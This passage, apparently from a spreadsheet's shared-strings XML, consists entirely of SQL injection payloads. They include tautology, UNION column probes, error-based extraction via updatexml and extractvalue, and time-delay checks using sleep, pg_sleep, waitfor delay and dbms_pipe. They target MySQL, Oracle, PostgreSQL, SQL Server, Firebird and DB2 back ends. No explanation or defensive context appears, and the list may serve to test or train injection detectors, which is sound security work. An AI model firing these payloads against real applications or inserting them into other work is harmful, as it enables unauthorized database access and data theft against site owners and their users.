    <t>1'  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-7103  )  )   or 4610 = 1871 and   (  (  1249 = 1249</t>
  </si>
  <si>
    <t>1' where 8277 = 8277 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) # dyed</t>
  </si>
  <si>
    <t>-8971'|| ( select 'smyx' where 7970 = 7970 union all select 7970,7970,7970,7970,7970,7970,7970#</t>
  </si>
  <si>
    <t>1 )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 5037 = 5037</t>
  </si>
  <si>
    <t>-5152'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr (</t>
  </si>
  <si>
    <t>-2761 or 1144 = 7657-- mfml</t>
  </si>
  <si>
    <t xml:space="preserve">1',row ( 7937,5067 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 7937 = 7937,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 9974 union select 5497 union select 8209 union select 8147 ) a group by x ) </t>
  </si>
  <si>
    <t>-3729'  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>-8131'  )  )   or 9680 = 3467</t>
  </si>
  <si>
    <t>1%' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-9352"  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1' )  as mpsf where 3348 = 3348</t>
  </si>
  <si>
    <t>1%' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'pwuy' = 'pwuy</t>
  </si>
  <si>
    <t>1"  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "lazm" like "lazm</t>
  </si>
  <si>
    <t>1"  )  )   or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>-2377%'  )  )   )  union all select 7706,7706--</t>
  </si>
  <si>
    <t>1 )  where 5012 = 5012  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>1" where 9135 = 9135 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>-9183" )  as wctu where 2058 = 2058 or 3038 = 3038</t>
  </si>
  <si>
    <t>1'+ ( select sfmz where 4870 = 4870 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%'  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  #</t>
  </si>
  <si>
    <t>1' )  as siyk where 1514 = 1514 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' union all select null,null#</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 ) # pjvi</t>
  </si>
  <si>
    <t>1"  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 'wmrr' like 'wmrr</t>
  </si>
  <si>
    <t>-8026 or elt ( 8434 = 4516,4516 ) # bsqo</t>
  </si>
  <si>
    <t>1'|| ( select 'vuku' where 3143 = 3143 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1%" and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and "%" = "</t>
  </si>
  <si>
    <t>select  ( case when  ( 4061 = 1396 )  then 4061 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'etvo' from dual where 1557 = 1557</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 3760 = 4785,1,1/0 ) </t>
  </si>
  <si>
    <t>-7795" )  where 1712 = 1712 union all select 1712,1712,1712,1712#</t>
  </si>
  <si>
    <t>1' )  as bfgl where 8959 = 8959 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">-5449' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1  )  )   rlike  ( select  ( case when  ( 6113 = 1222 )  then 1 else 0x28 end  )  )   and   (  (  2815 = 2815</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 2106 = 2106 )  then  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  else 2106* ( select 2106 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1" )  where 2764 = 2764 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1' )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 'ndhn' like 'ndhn</t>
  </si>
  <si>
    <t>-3215" )  union all select 4457,4457,4457,4457,4457#</t>
  </si>
  <si>
    <t>1%' )  and 4061 = 2730#</t>
  </si>
  <si>
    <t>1'  )  )   as fwhv where 3921 = 3921 union all select null,null--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%" and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-8868" )  where 5681 = 5681 union all select 5681,5681,5681,5681,5681,5681,5681,5681,5681,5681--</t>
  </si>
  <si>
    <t>1%'  )  )   )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( 5030 = 5030</t>
  </si>
  <si>
    <t>1%' )  or sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  "dyoe" = "dyoe</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%" )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "ampn" like "ampn</t>
  </si>
  <si>
    <t>1 )  as iupg where 2861 = 2861 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-8328 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'vxfx' where 7038 = 7038 and 9306 = 4187 ) ||'</t>
  </si>
  <si>
    <t>1%" union all select null,null#</t>
  </si>
  <si>
    <t>1  )  )   as tuxy where 6855 = 6855 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-3688'|| ( select 'pber' from dual where 7137 = 7137 order by 1#</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'conm' like 'conm</t>
  </si>
  <si>
    <t>1"  )  )   as gawq where 4728 = 4728 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1' )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 'cpfn' like 'cpfn</t>
  </si>
  <si>
    <t>1'  )  )   as xebq where 7959 = 7959 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  and elt ( 4249 = 4249,7259 )  and  ( 'bkag' = 'bkag</t>
  </si>
  <si>
    <t>1 )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1 and 6802 = 3592--</t>
  </si>
  <si>
    <t>1 )  where 2543 = 2543</t>
  </si>
  <si>
    <t>1'  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  'rpof' like 'rpof</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'njge' like 'njge</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  'keoy' = 'keoy</t>
  </si>
  <si>
    <t>1" )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( "zvew" like "zvew</t>
  </si>
  <si>
    <t>1' )  rlike sleep ( 5 )  and  ( 'tslp' = 'tslp</t>
  </si>
  <si>
    <t>1" and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "wtkx" = "wtkx</t>
  </si>
  <si>
    <t>-9821 )  as qqrm where 7152 = 7152 union all select 7152,7152,7152,7152--</t>
  </si>
  <si>
    <t>1" and 1668 = 8288</t>
  </si>
  <si>
    <t>1' in boolean mode )  and make_set ( 7804 = 3315,3315 ) #</t>
  </si>
  <si>
    <t>-5132%"  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>1%" )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( 'nsji' = 'nsji</t>
  </si>
  <si>
    <t>-5350  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>1'+ ( select gajr where 6653 = 6653 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>-4323'  )  )   or 6968 = 1393</t>
  </si>
  <si>
    <t>1'|| ( select 'xhcr' from dual where 9279 = 9279</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 1392 = 1380 )  then 1 else 1392* ( select 1392 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1  )  )   )  and 6467 = 1864#</t>
  </si>
  <si>
    <t>1' )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 'iixp' = 'iixp</t>
  </si>
  <si>
    <t>-9057" )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-7054 )  as gzvf where 9146 = 9146 or 3038 = 3038</t>
  </si>
  <si>
    <t>select  ( case when  ( 6204 = 1913 )  then 6204 else 6204* ( select 6204 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1%" and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' where 5801 = 5801 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1" where 1166 = 1166</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( 'vnss' like 'vnss</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  "mmvu" = "mmvu</t>
  </si>
  <si>
    <t>1'+ ( select ahyw where 6893 = 6893 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-3104" union all select 5717,5717,5717,5717,5717,5717,5717,5717,5717--</t>
  </si>
  <si>
    <t>-5247" union all select 3097,3097,3097,3097,3097,3097,3097#</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' )  as gsjr where 7046 = 7046 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'ppwh' = 'ppwh</t>
  </si>
  <si>
    <t>-5524 )  as eoyk where 6928 = 6928 union all select 6928,6928,6928,6928,6928,6928,6928,6928,6928--</t>
  </si>
  <si>
    <t>1" )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( "wvkp" like "wvkp</t>
  </si>
  <si>
    <t>-5032' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t>1'|| ( select 'ufgs' where 9670 = 9670 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1'+ ( select 'gjaq' where 5449 = 5449 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>1'+ ( select vlut where 9517 = 9517 union all select null,null,null--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) #</t>
  </si>
  <si>
    <t>1' )  and  ( 1471 = 7892 ) *7892 and  ( 'kkok' like 'kkok</t>
  </si>
  <si>
    <t>-4523 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>1%"  )  )   and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'utlx' where 6256 = 6256 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   ) +'</t>
  </si>
  <si>
    <t>1" )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "ilrk" = "ilrk</t>
  </si>
  <si>
    <t>1%'  )  )   or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'bxjo' like 'bxjo</t>
  </si>
  <si>
    <t>1'|| ( select 'vwop' where 8536 = 8536 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>-8369"  )  )   union all select 2191--</t>
  </si>
  <si>
    <t>1%"  )  )   rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'+ ( select echl where 6593 = 6593 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 5981 = 6700</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and elt ( 4249 = 4249,7259 ) </t>
  </si>
  <si>
    <t>1'+ ( select 'igoi' where 7823 = 7823 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'</t>
  </si>
  <si>
    <t>1  )  )   as aeat where 1007 = 1007 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as oiqr where 4073 = 4073 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   as hwlh where 1071 = 1071 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-3885 )  where 2387 = 2387 union all select 2387,2387,2387,2387,2387,2387,2387#</t>
  </si>
  <si>
    <t xml:space="preserve">-2131" or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  ) </t>
  </si>
  <si>
    <t>1'+ ( select 'qylf' where 6984 = 6984 and 2255 = 5094</t>
  </si>
  <si>
    <t>1' or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'nepn' = 'nepn</t>
  </si>
  <si>
    <t>1 )  as oblq where 2002 = 2002 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>1' )  where 8429 = 8429</t>
  </si>
  <si>
    <t>1'  )  )   as xqvq where 4816 = 4816 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-2869'  )  )   union all select 3216--</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( 'aydg' = 'aydg</t>
  </si>
  <si>
    <t>1%' )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>-6217  )  )   as hyws where 3441 = 3441 or 9421 = 4695#</t>
  </si>
  <si>
    <t>1' and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'pnpx' = 'pnpx</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   as bwrg where 3254 = 3254 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3--</t>
  </si>
  <si>
    <t>1 where 2060 = 2060</t>
  </si>
  <si>
    <t>1' where 1623 = 1623</t>
  </si>
  <si>
    <t>1' in boolean mode )  waitfor delay '0:0:5'#</t>
  </si>
  <si>
    <t>-1641'|| ( select 'jfnu' where 7682 = 7682 union all select 7682,7682,7682--</t>
  </si>
  <si>
    <t>1' or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'vgro' like 'vgro</t>
  </si>
  <si>
    <t>1%" and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">-7659' )  as bowy where 4835 = 4835 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>1' where 6116 = 6116</t>
  </si>
  <si>
    <t>1  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  5349 = 5349</t>
  </si>
  <si>
    <t>select case when 3076 = 1605 then 1 else null end--</t>
  </si>
  <si>
    <t>1'|| ( select 'oxas' from dual where 8284 = 8284 or sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve"> ( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 9339 = 9339 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- zimf</t>
  </si>
  <si>
    <t>-1558 or elt ( 3306 = 2272,2272 ) -- ioxt</t>
  </si>
  <si>
    <t>1' )  as ycsr where 2238 = 2238 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1'+ ( select gqez where 3704 = 3704</t>
  </si>
  <si>
    <t xml:space="preserve">1" or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   )  or sleep ( 5 )  and   (  (   ( "eran" = "eran</t>
  </si>
  <si>
    <t>-4641" )  where 4212 = 4212 or make_set ( 3595 = 4062,4062 ) --</t>
  </si>
  <si>
    <t>1 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  -- zozj</t>
  </si>
  <si>
    <t>1'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'qvqf' = 'qvqf</t>
  </si>
  <si>
    <t>-5547' or 9323 = 9323#</t>
  </si>
  <si>
    <t xml:space="preserve">-4592"  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and  ( 'labj' = 'labj</t>
  </si>
  <si>
    <t>-7683" )  where 9664 = 9664 union all select 9664,9664,9664,9664,9664,9664,9664#</t>
  </si>
  <si>
    <t>1 where 8921 = 8921 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1%" )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-1684"  )  )   )  union all select 7473,7473#</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'gsdq' = 'gsdq</t>
  </si>
  <si>
    <t>1' and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and 'lqsa' like 'lqsa</t>
  </si>
  <si>
    <t>1%' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-4535' )  union all select 8491,8491,8491,8491,8491,8491--</t>
  </si>
  <si>
    <t>1" where 8379 = 8379 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  where 1793 = 1793</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null#</t>
  </si>
  <si>
